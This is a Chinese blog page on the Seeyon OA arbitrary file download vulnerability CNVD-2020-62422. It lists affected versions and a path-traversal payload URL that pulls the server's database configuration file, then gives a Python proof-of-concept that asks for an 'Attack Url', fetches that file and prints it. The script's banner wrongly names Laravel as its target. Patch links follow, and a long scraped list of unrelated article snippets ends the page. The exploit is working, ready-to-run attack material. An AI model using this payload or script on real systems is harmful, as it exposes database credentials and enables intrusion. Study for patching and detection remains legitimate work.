1stPeak
1stPeak

致远OA任意文件下载漏洞(CNVD-2020-62422)

文章目录

    • 漏洞描述
    • 影响版本
    • payload
    • poc
    • 漏洞复现
    • 修复补丁

漏洞描述

致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息

影响版本

致远OA A6-V5
致远OA A8-V5
致远OA G6

payload

致远OA webmail.do文件读取漏洞,由于/seeyon/webmail.do 页面 filePath 参数过滤不严,导致可以读取系统敏感文件。
通过修改filePath参数来下载服务器文件
例:

http://xx.xx.xx.xx/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
注:存在漏洞的OA系统将会下载datasourceCtp.properties配置文件,其中index.jsp可自己选择其它文件,也可更改参数filePath下载其他文件

poc

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
    print('+  \033[34mVersion: Laravel framework <= 5.5.21                              \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/seeyon/webmail.do?method=doDownloadAtt&filename=PeiQi.txt&filePath=../conf/datasourceCtp.properties"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "workflow" in response.text:
            print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url))
            print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text))
        else:
            print("\033[31m[x] 文件请求失败 \033[0m")
            sys.exit(0)
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    POC_1(target_url)

来源:https://www.seebug.org/vuldb/ssvid-99114

漏洞复现

致远OA任意文件下载漏洞(CNVD-2020-62422)_第1张图片

修复补丁

(1)http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=64

(2)http://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=65

你可能感兴趣的:(实战漏洞复现,CNVD-2020-62422,致远OA任意文件下载漏洞)

  • React18+Redux+antd 项目实战 JS Alexeigirl javascript开发语言前端框架react.js
    React18+Redux+antd项目实战jsAntDesign插件官网Axios官网(可配置请求拦截器和响应拦截器)JavaScript官网Echarts官网一、项目前期准备1.创建新项目hotel-managernpxcreate-react-apphotel-manager2.安装依赖//安装路由npmireact-router-domnpmiaixos//安装组件库npmiantdnpm
  • 软件架构原理与实战:模块化和组件化设计的最佳实践 AI天才研究院 AI实战AI大模型企业级应用开发实战大数据人工智能语言模型AILLMJavaPython架构设计AgentRPA
    1.背景介绍随着计算机技术的不断发展,软件系统的规模和复杂性不断增加。为了更好地组织和管理软件系统的代码和功能,软件架构设计成为了一个重要的研究领域。在这篇文章中,我们将讨论模块化和组件化设计的最佳实践,以及如何在实际项目中应用这些设计原则。模块化和组件化设计是软件架构设计的两个核心概念。模块化是指将软件系统划分为多个相互独立的模块,每个模块负责完成特定的功能。组件化是指将软件系统划分为多个可重用
  • 软件架构原理与实战:解读架构师的职业发展路径 AI天才研究院 架构师必知必会系列大数据人工智能语言模型AILLMJavaPython架构设计AgentRPA
    文章目录软件架构原理与实战:解读架构师的职业发展路径(1)一、软件架构的基本概念二、软件架构师的角色三、软件架构师的职业发展路径四、软件架构的原则与实战五、结语软件架构原理与实战:解读架构师的职业发展路径(2)引言软件架构的核心原理抽象化模块化封装分层服务导向架构(SOA)实战经验了解业务需求技术选型设计模式的运用性能优化安全性设计可扩展性与可维护性架构师的职业发展路径初级阶段:技术专长中级阶段:
  • 【游戏开发】Unity手游使用XLua热更新增UI界面方法 归暮亭 游戏开发游戏开发c#lua游戏unity
    **准备(前置条件):Xlua相关文件已导入工程,已经能够进行patchfile热更修改一、C#写一个LuaWindow基类包含3个步骤:1.读入lua文件:publicstaticboolLoadLuaScript(stringwindowName){if(!mLuaWindowFileDic.ContainsKey(windowName)){if(!LoadXLuaFile("..."+".b
  • Mac 安装Mysql启动Mysql以及数据库的常规操作 荆州克莱 面试题汇总与解析springcloudspringbootspring技术css3
    Mac安装Mysql启动Mysql以及数据库的常规操作一、mysql的安装1、登录官方网站:dev.mysql.com/downloads/mysql/二、查看系统架构```uname-m```在MAC中:如果输出结果是x86_64,则表示你的系统是x86-64架构。如果输出结果是arm64,则表示你的系统是arm64架构。根据自身系统架构进行下载安装2、安装完成打开系统设置3、安全模式启动```
  • 架构管理实战(1):通过架构工具实现架构标准、规范化管理 迪今科技 架构
    企业架构治理是体系化工程,跨越时间周期长,且覆盖架构设计、发布、更新等生命周期,同时涉及业务、应用、数据及技术等不同架构领域,需多专业、跨团队协作。企业架构的标准化、规范化管理是开展架构长期、可持续的关键,不仅确保不同系统、团队和技术之间的一致性与协同合作,减少了重复建设和技术债务,还提升了架构的可维护性和可扩展性。架构标准、规划化管理难点与对策架构治理开展落地过程中,架构标准和规范管理作为架构治
  • aggr代码 cellranger_单细胞实战(四) Cell Ranger流程概览 龙宫里的乙民 aggr代码cellranger
    实战演练理论知识学再好,能付诸实践灵活运用才行,所以我们常强调知行合一,实践出真知。实战演练这个栏目就是带大家从头到尾完整复现单细胞文献分析流程。好了,干货多,屁话少,我们来看实战流程。希望大家能有所收获!总的来说,CellRanger主要的流程有:拆分数据mkfastq、细胞定量count、定量组合aggr、调参reanalyze,还有一些小工具比如mkref、mkgtf、upload、site
  • pyqt5多线程优化_告别阻塞!实例讲解PyQt5多线程QThread的运用 檀临 pyqt5多线程优化
    点击关注州的先生编程应用、实战教程,不容错过PS:本文来自于小伙伴的投稿,由伊洛首发于简书。QThread类提供了一种独立于平台的线程管理方法。QThread对象管理程序中的一个控制线程,在run()中开始执行QThreads。默认情况下,run()通过调用exec()启动事件循环,并在线程中运行Qt事件循环。classThread(QThread):def__init__(self):super
  • 【GO实战课】第三讲:电子商务网站(3)——架构和路由 earthzhang2021 GO语言编程入门golang架构开发语言
    1.简介本课程将探讨电子商务网站的架构和路由,以及使用GO语言实现。在本课程中,我们将介绍如何设计一个可扩展、可靠和高性能的电子商务网站架构,并演示如何使用GO语言编写路由代码。本课程的目标是帮助学生理解电子商务网站的架构,并提供一个实际的项目,以便他们可以在实践中应用所学知识。通过完成本课程,学员将能够:理解电子商务网站的架构设计原则;掌握使用RESTfulAPI构建电子商务网站的基本知识;学习
  • 微信小程序中在一个大边框里给每个小边框均匀分配空间 Colinnian 微信小程序notepad++小程序
    initBoard(){constdots=[];for(leti=0;i<9;i++){for(letj=0;j<9;j++){dots.push({className:"blank",});}}this.setData({dots});},假设我现在创建一个81格的正方形,我要怎么写css代码呢.waibiankuang{width:690rpx;height:690rpx;border:5r
  • spring cloud netflix笔记 精神病院丶吴院长 个人笔记springcloudspring
    Ribbon可以通过配置文件制定负载均衡的规则默认使用轮训算法来实现负载均衡根据响应时间做权重两个自动装配类RibbonAutoConfiguration和LoadBalancerAutoConfiguration装配类会让加了LoadBalanced注解的RestTemplate加上一个拦截器LoadBalancerInterceptor关键类LoadBalancerInterceptorRib
  • 网络安全实战指南:攻防技术与防御策略 一ge科研小菜鸡 运维网络
    个人主页:一ge科研小菜鸡-CSDN博客期待您的关注1.引言随着数字化转型的加速,网络安全已成为各行业不可忽视的重要领域。从数据泄露到勒索软件攻击,网络威胁日益复杂,企业和个人都面临严峻挑战。本教程将介绍网络安全的基础知识、攻击方式、防御策略,并提供实践案例与技术示例,帮助读者掌握关键安全技术。2.网络安全基础2.1网络安全的主要领域网络安全涉及多个方面,以下是主要的安全领域:安全领域描述常见技术
  • k8s service管理之WEB管理工具Dashboard 烤鸡翅^_^我最爱吃 kubernetes容器云原生
    Dashboard1.Dashboard概述-Dashboard是基于网页的Kubernetes用户界面。-Dashboard同时展示了Kubernetes集群中的资源状态信息和所有报错信息。-可以使用Dashboard将应用部署到集群中,也可以对容器应用排错,还能管理集群资源。列如,你可以对应用弹性伸缩、发起滚动升级、重启等等。-Dashboard官网:https://github.com/ku
  • web安全漏洞之命令注入 rzydal 笔记网络安全web安全安全学习
    命令注入1.什么是命令注入通常情况下,开发者使用一些可以执行命令的函数且未对用户输入进行安全检查时,可以造成命令注入。从CTF的角度来讲,命令注入可以实现:1、直接读取flag2、反弹shell3、利用题目环境漏洞,控制整个题目环境,干扰其他队伍解题在各类编程语言中,都存在直接调用系统命令的函数,比如PHP的system函数,Python的os.system,Java的Runtime.exec都可
  • tkinter-TinUI-xml实战(11)文本阅读、编辑器 Smart-Space 笔记TinUItkinter实验pythontkinterTinUI
    tkinter-TinUI-xml实战(11)文本阅读、编辑器引言阅读器编辑器TinMaker界面搜索框界面引言本文基于作者自己的项目TinText编写。TinText是一个TinML阅读、编辑、整合组件软件。阅读器阅读器界面很简单,主要就是顶部的菜单栏,以及占了绝对面积的文本框,不过文本框是基于新版TinEngine的,不是本文重点。菜单栏可以使用TinUI的menubutton实现,把这些控件
  • SpringCloud之服务间通信超时:突破微服务的“时间枷锁” 奔跑吧邓邓子 SpringCloud深入浅出springcloud微服务通信超时
    目录引言一、通信超时的“导火索”(一)网络不稳定(二)服务性能瓶颈(三)配置参数不合理二、实战!解决超时的“组合拳”(一)优化超时配置参数1.Ribbon配置2.Feign配置(二)使用断路器(Hystrix)1.原理介绍2.配置与使用(三)服务端性能优化1.代码优化2.资源优化(四)重试机制1.Ribbon重试2.Feign重试三、实战演练:代码示例解析(一)构建简单的SpringCloud项目
  • python系列(fastapi):ERROR: Error loading ASGI app. Could not import module “main“. 坦笑&&life #pythonpythonfastapi开发语言
    ERROR:ErrorloadingASGIapp.Couldnotimportmodule"main".ERROR:ErrorloadingASGIapp.Couldnotimportmodule"main".ERROR:ErrorloadingASGIapp.Couldnotimportmodule“main”.fastapi项目启动时,提示ERROR:ErrorloadingASGIapp.
  • FFmpeg工具使用基础 2035去旅行 FFmpegffmpeg
    一、FFmpeg工具介绍FFmpeg命令行工具主要包括以下几个部分:‌ffmpeg‌:编解码工具‌ffprobe‌:多媒体分析器‌ffplay‌:简单的音视频播放器这些工具共同构成了FFmpeg的核心功能,支持各种音视频格式的处理和转换‌二、在Ubuntu18.04上安装FFmpeg工具1、sudoapt-update2、sudoapt-getinstallffmpeg3、安装完成后,使用ffmp
  • 【docker】拉取镜像报证书错误:error pulling image configuration: download failed after attempts=6: tls: failed t 眉梢i docker容器运维
    在使用docker时,采用阿里云镜像源时会出现pull失败情况:解决办法:sudomkdir-p/etc/dockersudotee/etc/docker/daemon.json<<-'EOF'{"registry-mirrors":["https://yxzrazem.mirror.aliyuncs.com"]}EOFsudosystemctldaemon-reloadsudosystemctl
  • 国外SIM卡有信号无法连接,如何解决? bug菌¹ 全栈Bug调优(实战版)#CSDN问答解惑(全栈版)网络协议网络信息与通信5G
    本文收录于《CSDN问答解惑-专业版》专栏,主要记录项目实战过程中的Bug之前因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由;同时,欢迎大家关注&&收藏&&订阅!持续更新中,up!up!up!!问题描述  国外SIM卡有信号无法连接,如何解决?我的SIM卡是阿富汗MTN的卡,到了中国开始可以使用,过了一段时间,没钱了,自然就不能使用了可是当我再次存钱后,仍然不能使用
  • 深入解析:Python中的决策树与随机森林 小鹿( ﹡ˆoˆ﹡ ) Pythonpython决策树随机森林Python
    在这个数据驱动的时代,机器学习技术已经成为许多企业和研究机构不可或缺的一部分。其中,决策树和随机森林作为两种强大的算法,在分类和回归任务中表现尤为出色。本文将带领大家深入了解这两种算法在Python中的实现,从基础到实战,逐步揭开它们的神秘面纱。引言决策树是一种非常直观的预测模型,它通过一系列规则对数据进行分割,最终形成树状结构。而随机森林则是基于决策树的一种集成学习方法,通过构建多个决策树并取其
  • CSS布局和定位应用方案 天涯学馆 大前端&移动端全栈架构css前端
    目录浮动布局绝对布局表格布局响应式布局弹性布局网格布局多栏布局浮动布局CSS3浮动布局的核心在于使用float属性将元素移出文档流,通过左右浮动来排列元素,并结合clear属性或清除浮动技巧(如这里的伪元素法)来处理浮动带来的副作用。尽管浮动布局在某些简单布局中依然实用,但对于更复杂的布局需求&#
  • 构建一个安全可靠的身份认证中心和资源服务中心:SpringSecurity+OAuth2.0的完美结合(一) 凛鼕将至 Java技术栈高级攻略java安全架构安全
    本系列文章简介:本系列文章将详细介绍如何使用SpringSecurity和OAuth2.0构建身份认证中心和资源服务中心。我们将从基本的认证和授权开始,逐步扩展到高级功能,如单点登录、多因素认证等。同时,我们还将介绍如何使用SpringSecurity和OAuth2.0提供的其他功能,如注销、记住我等。通过本系列文章的学习,大家将掌握如何使用SpringSecurity和OAuth2.0构建一个安
  • spring security oauth2.0 实现 weixin_33726943 json数据库java
    oauth应该属于security的一部分。关于oauth的的相关知识可以查看阮一峰的文章:http://www.ruanyifeng.com/blog/2014/05/oauth_2_0.html一、目标现在很多系统都支持第三方账号密码等登陆我们自己的系统,例如:我们经常会看到,一些系统使用微信账号,微博账号、QQ账号等登陆自己的系统,我们现在就是要模拟这种登陆的方式,很多大的公司已经实现了这种
  • Swift教程17-淡化MVC,使用MVVM框架开发轻巧便于维护的iOS app BoolBear iosswiftmvvm
    MVVM是微软提出一种移动开发框架,旨在针对传统的MVC框架,解决传统的MVC框架的控制器的臃肿问题.M:Model模型,也就是数据模型;比如一条微博,对应的所有字段合成一条微博整体,这个整体就是ModelV:View视图,只用来显示的视图,如iOS的UIView,Cell;当然在iOS中Storyboard中,view总是和控制器关联,这并不是严格的view如果我们纯手写代码定义一个view那么
  • 浅谈Python项目开发&管理 老胡的储物柜 javapython编程语言大数据linux
    本文主要探讨的是个人在Python项目开发&管理这块的一些经验之谈,经过在团队实践后主要内容总结如下:基础环境管理编码标准&规范化远程开发项目脚手架????环境管理使用Anaconda和Pipenv共同管理Python项目环境环境管理这块是个很普遍的问题,其面临的问题如下:如何对不同项目,任意Python版本的环境进行管控如何对不同项目,内外网Python依赖库进行管控(有些包是公司内部开发,那么
  • HDFS分布式文件系统3-2 shell定期采集数据到HDFS 诺特兰德 hdfshadoop大数据
    1、准备工作创建目录:/export/data/logs/log/export/data/logs/toupload2、在/export/data/logs目录下创建upload2HDFS.sh内容如下:#!/bin/bashexportJAVA_HOME=/export/servers/jdkexportJRE_HOME=$JAVA_HOME/jreexportCLASSPATH=.:JAVA_
  • Autosar通信实战系列09-CanIf模块要点及其配置介绍(一) Autosar汽车电子进阶 autosar通信CAN
    本文框架前言1.Physicalchannels,CANController,CANNode概念2.BasicCAN与FullCAN3.报文过滤(掩码)4.报文Dlc校验5.CanIf模块功能5.1CANcontrollers和CANtransceivers控制5.2提供报文收发机制5.3唤醒源校验前言在本系列笔者将结合工作中对通信实战部分的应用经验进一步介绍常用,包括但不限于通信各模块的开发教程
  • Spring Boot + Spring Security + OAuth2 搭建 (一) hello_world! 框架工具springbootspring
    https://blog.csdn.net/wllovar/article/details/87621910源代码地址:https://download.csdn.net/download/wllovar/10963011具体那里有疑问可以给我发邮件[email protected]最近应项目需求想搞一些类似微信公众平台那样的提供第三方访问的API,这就要用到OAuth2,具体OAuth2的认证流
  • VTK—vtkCutter截取平面数据 千秋10000 平面
    ,本例vtkCutter可以配合隐式函数截取数据使用vtkPlane隐式函数配合vtkWidget截取任意平面。1.读入数据Create(vtkMultiBlockPLOT3DReader,reader);reader->SetXYZFileName("G:/Temp/vtkTest/combxyz.bin");reader->SetQFileName("G:/Temp/vtkTest/combq
  • 强大的销售团队背后 竟然是大数据分析的身影 蓝儿唯美 数据分析
    Mark Roberge是HubSpot的首席财务官,在招聘销售职位时使用了大量数据分析。但是科技并没有挤走直觉。 大家都知道数理学家实际上已经渗透到了各行各业。这些热衷数据的人们通过处理数据理解商业流程的各个方面,以重组弱点,增强优势。 Mark Roberge是美国HubSpot公司的首席财务官,HubSpot公司在构架集客营销现象方面出过一份力——因此他也是一位数理学家。他使用数据分析
  • Haproxy+Keepalived高可用双机单活 bylijinnan 负载均衡keepalivedhaproxy高可用
    我们的应用MyApp不支持集群,但要求双机单活(两台机器:master和slave): 1.正常情况下,只有master启动MyApp并提供服务 2.当master发生故障时,slave自动启动本机的MyApp,同时虚拟IP漂移至slave,保持对外提供服务的IP和端口不变 F5据说也能满足上面的需求,但F5的通常用法都是双机双活,单活的话还没研究过 服务器资源 10.7
  • eclipse编辑器中文乱码问题解决 0624chenhong eclipse乱码
    使用Eclipse编辑文件经常出现中文乱码或者文件中有中文不能保存的问题,Eclipse提供了灵活的设置文件编码格式的选项,我们可以通过设置编码 格式解决乱码问题。在Eclipse可以从几个层面设置编码格式:Workspace、Project、Content Type、File 本文以Eclipse 3.3(英文)为例加以说明: 1. 设置Workspace的编码格式: Windows-&g
  • 基础篇--resources资源 不懂事的小屁孩 android
    最近一直在做java开发,偶尔敲点android代码,突然发现有些基础给忘记了,今天用半天时间温顾一下resources的资源。 String.xml    字符串资源   涉及国际化问题  http://www.2cto.com/kf/201302/190394.html   string-array
  • 接上篇补上window平台自动上传证书文件的批处理问卷 酷的飞上天空 window
    @echo off : host=服务器证书域名或ip,需要和部署时服务器的域名或ip一致 ou=公司名称, o=公司名称 set host=localhost set ou=localhost set o=localhost set password=123456 set validity=3650 set salias=s
  • 企业物联网大潮涌动:如何做好准备? 蓝儿唯美 企业
    物联网的可能性也许是无限的。要找出架构师可以做好准备的领域然后利用日益连接的世界。 尽管物联网(IoT)还很新,企业架构师现在也应该为一个连接更加紧密的未来做好计划,而不是跟上闸门被打开后的集成挑战。“问题不在于物联网正在进入哪些领域,而是哪些地方物联网没有在企业推进,” Gartner研究总监Mike Walker说。 Gartner预测到2020年物联网设备安装量将达260亿,这些设备在全
  • spring学习——数据库(mybatis持久化框架配置) a-john mybatis
    Spring提供了一组数据访问框架,集成了多种数据访问技术。无论是JDBC,iBATIS(mybatis)还是Hibernate,Spring都能够帮助消除持久化代码中单调枯燥的数据访问逻辑。可以依赖Spring来处理底层的数据访问。 mybatis是一种Spring持久化框架,要使用mybatis,就要做好相应的配置: 1,配置数据源。有很多数据源可以选择,如:DBCP,JDBC,aliba
  • Java静态代理、动态代理实例 aijuans Java静态代理
    采用Java代理模式,代理类通过调用委托类对象的方法,来提供特定的服务。委托类需要实现一个业务接口,代理类返回委托类的实例接口对象。 按照代理类的创建时期,可以分为:静态代理和动态代理。 所谓静态代理: 指程序员创建好代理类,编译时直接生成代理类的字节码文件。 所谓动态代理: 在程序运行时,通过反射机制动态生成代理类。   一、静态代理类实例: 1、Serivce.ja
  • Struts1与Struts2的12点区别 asia007 Struts1与Struts2
    1) 在Action实现类方面的对比:Struts 1要求Action类继承一个抽象基类;Struts 1的一个具体问题是使用抽象类编程而不是接口。Struts 2 Action类可以实现一个Action接口,也可以实现其他接口,使可选和定制的服务成为可能。Struts 2提供一个ActionSupport基类去实现常用的接口。即使Action接口不是必须实现的,只有一个包含execute方法的P
  • 初学者要多看看帮助文档 不要用js来写Jquery的代码 百合不是茶 jqueryjs
    解析json数据的时候需要将解析的数据写到文本框中,  出现了用js来写Jquery代码的问题;   1, JQuery的赋值  有问题    代码如下: data.username 表示的是:  网易            $("#use
  • 经理怎么和员工搞好关系和信任 bijian1013 团队项目管理管理
            产品经理应该有坚实的专业基础,这里的基础包括产品方向和产品策略的把握,包括设计,也包括对技术的理解和见识,对运营和市场的敏感,以及良好的沟通和协作能力。换言之,既然是产品经理,整个产品的方方面面都应该能摸得出门道。这也不懂那也不懂,如何让人信服?如何让自己懂?就是不断学习,不仅仅从书本中,更从平时和各种角色的沟通
  • 如何为rich:tree不同类型节点设置右键菜单 sunjing contextMenutreeRichfaces
    组合使用target和targetSelector就可以啦,如下: <rich:tree id="ruleTree" value="#{treeAction.ruleTree}" var="node" nodeType="#{node.type}" selectionChangeListener=&qu
  • 【Redis二】Redis2.8.17搭建主从复制环境 bit1129 redis
    开始使用Redis2.8.17 Redis第一篇在Redis2.4.5上搭建主从复制环境,对它的主从复制的工作机制,真正的惊呆了。不知道Redis2.8.17的主从复制机制是怎样的,Redis到了2.4.5这个版本,主从复制还做成那样,Impossible is nothing! 本篇把主从复制环境再搭一遍看看效果,这次在Unbuntu上用官方支持的版本。   Ubuntu上安装Red
  • JSONObject转换JSON--将Date转换为指定格式 白糖_ JSONObject
    项目中,经常会用JSONObject插件将JavaBean或List<JavaBean>转换为JSON格式的字符串,而JavaBean的属性有时候会有java.util.Date这个类型的时间对象,这时JSONObject默认会将Date属性转换成这样的格式:   {"nanos":0,"time":-27076233600000,
  • JavaScript语言精粹读书笔记 braveCS JavaScript
    【经典用法】:   //①定义新方法 Function .prototype.method=function(name, func){ this.prototype[name]=func; return this; } //②给Object增加一个create方法,这个方法创建一个使用原对
  • 编程之美-找符合条件的整数 用字符串来表示大整数避免溢出 bylijinnan 编程之美
    import java.util.LinkedList; public class FindInteger { /** * 编程之美 找符合条件的整数 用字符串来表示大整数避免溢出 * 题目:任意给定一个正整数N,求一个最小的正整数M(M>1),使得N*M的十进制表示形式里只含有1和0 * * 假设当前正在搜索由0,1组成的K位十进制数
  • 读书笔记 chengxuyuancsdn 读书笔记
    1、Struts访问资源 2、把静态参数传递给一个动作 3、<result>type属性 4、s:iterator、s:if c:forEach 5、StringBuilder和StringBuffer 6、spring配置拦截器 1、访问资源 (1)通过ServletActionContext对象和实现ServletContextAware,ServletReque
  • [通讯与电力]光网城市建设的一些问题 comsci 问题
          信号防护的问题,前面已经说过了,这里要说光网交换机与市电保障的关系       我们过去用的ADSL线路,因为是电话线,在小区和街道电力中断的情况下,只要在家里用笔记本电脑+蓄电池,连接ADSL,同样可以上网........     
  • oracle 空间RESUMABLE daizj oracle空间不足RESUMABLE错误挂起
    空间RESUMABLE操作  转 Oracle从9i开始引入这个功能,当出现空间不足等相关的错误时,Oracle可以不是马上返回错误信息,并回滚当前的操作,而是将操作挂起,直到挂起时间超过RESUMABLE TIMEOUT,或者空间不足的错误被解决。 这一篇简单介绍空间RESUMABLE的例子。 第一次碰到这个特性是在一次安装9i数据库的过程中,在利用D
  • 重构第一次写的线程池 dieslrae 线程池 python
    最近没有什么学习欲望,修改之前的线程池的计划一直搁置,这几天比较闲,还是做了一次重构,由之前的2个类拆分为现在的4个类. 1、首先是工作线程类:TaskThread,此类为一个工作线程,用于完成一个工作任务,提供等待(wait),继续(proceed),绑定任务(bindTask)等方法 #!/usr/bin/env python # -*- coding:utf8 -*-
  • C语言学习六指针 dcj3sjt126com c
    初识指针,简单示例程序: /* 指针就是地址,地址就是指针 地址就是内存单元的编号 指针变量是存放地址的变量 指针和指针变量是两个不同的概念 但是要注意: 通常我们叙述时会把指针变量简称为指针,实际它们含义并不一样 */ # include <stdio.h> int main(void) { int * p; // p是变量的名字, int *
  • yii2 beforeSave afterSave beforeDelete dcj3sjt126com delete
    public function afterSave($insert, $changedAttributes) { parent::afterSave($insert, $changedAttributes); if($insert) { //这里是新增数据 } else { //这里是更新数据 } }  
  • timertask shuizhaosi888 timertask
    java.util.Timer timer = new java.util.Timer(true); // true 说明这个timer以daemon方式运行(优先级低, // 程序结束timer也自动结束),注意,javax.swing // 包中也有一个Timer类,如果import中用到swing包, // 要注意名字的冲突。 TimerTask task = new
  • Spring Security(13)——session管理 234390216 sessionSpring Security攻击保护超时
    session管理 目录   1.1     检测session超时 1.2     concurrency-control 1.3     session 固定攻击保护         
  • 公司项目NODEJS实践0.3[ mongo / session ...] 逐行分析JS源代码 mongodbsessionnodejs
        http://www.upopen.cn   一、前言         书接上回,我们搭建了WEB服务端路由、模板等功能,完成了register 通过ajax与后端的通信,今天主要完成数据与mongodb的存取,实现注册 / 登录 /
  • pojo.vo.po.domain区别 LiaoJuncai javaVOPOJOjavabeandomain
      POJO = "Plain Old Java Object",是MartinFowler等发明的一个术语,用来表示普通的Java对象,不是JavaBean, EntityBean 或者 SessionBean。POJO不但当任何特殊的角色,也不实现任何特殊的Java框架的接口如,EJB, JDBC等等。      即POJO是一个简单的普通的Java对象,它包含业务逻辑
  • Windows Error Code OhMyCC windows
    0 操作成功完成. 1 功能错误. 2 系统找不到指定的文件. 3 系统找不到指定的路径. 4 系统无法打开文件. 5 拒绝访问. 6 句柄无效. 7 存储控制块被损坏. 8 存储空间不足, 无法处理此命令. 9 存储控制块地址无效. 10 环境错误. 11 试图加载格式错误的程序. 12 访问码无效. 13 数据无效. 14 存储器不足, 无法完成此操作. 15 系
  • 在storm集群环境下发布Topology roadrunners 集群stormtopologyspoutbolt
    storm的topology设计和开发就略过了。本章主要来说说如何在storm的集群环境中,通过storm的管理命令来发布和管理集群中的topology。   1、打包 打包插件是使用maven提供的maven-shade-plugin,详细见maven-shade-plugin。 <plugin> <groupId>org.apache.maven.
  • 为什么不允许代码里出现“魔数” tomcat_oracle java
      在一个新项目中,我最先做的事情之一,就是建立使用诸如Checkstyle和Findbugs之类工具的准则。目的是制定一些代码规范,以及避免通过静态代码分析就能够检测到的bug。   迟早会有人给出案例说这样太离谱了。其中的一个案例是Checkstyle的魔数检查。它会对任何没有定义常量就使用的数字字面量给出警告,除了-1、0、1和2。   很多开发者在这个检查方面都有问题,这可以从结果
  • zoj 3511 Cake Robbery(线段树) 阿尔萨斯 线段树
    题目链接:zoj 3511 Cake Robbery 题目大意:就是有一个N边形的蛋糕,切M刀,从中挑选一块边数最多的,保证没有两条边重叠。 解题思路:有多少个顶点即为有多少条边,所以直接按照切刀切掉点的个数排序,然后用线段树维护剩下的还有哪些点。 #include <cstdio> #include <cstring> #include <vector&
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他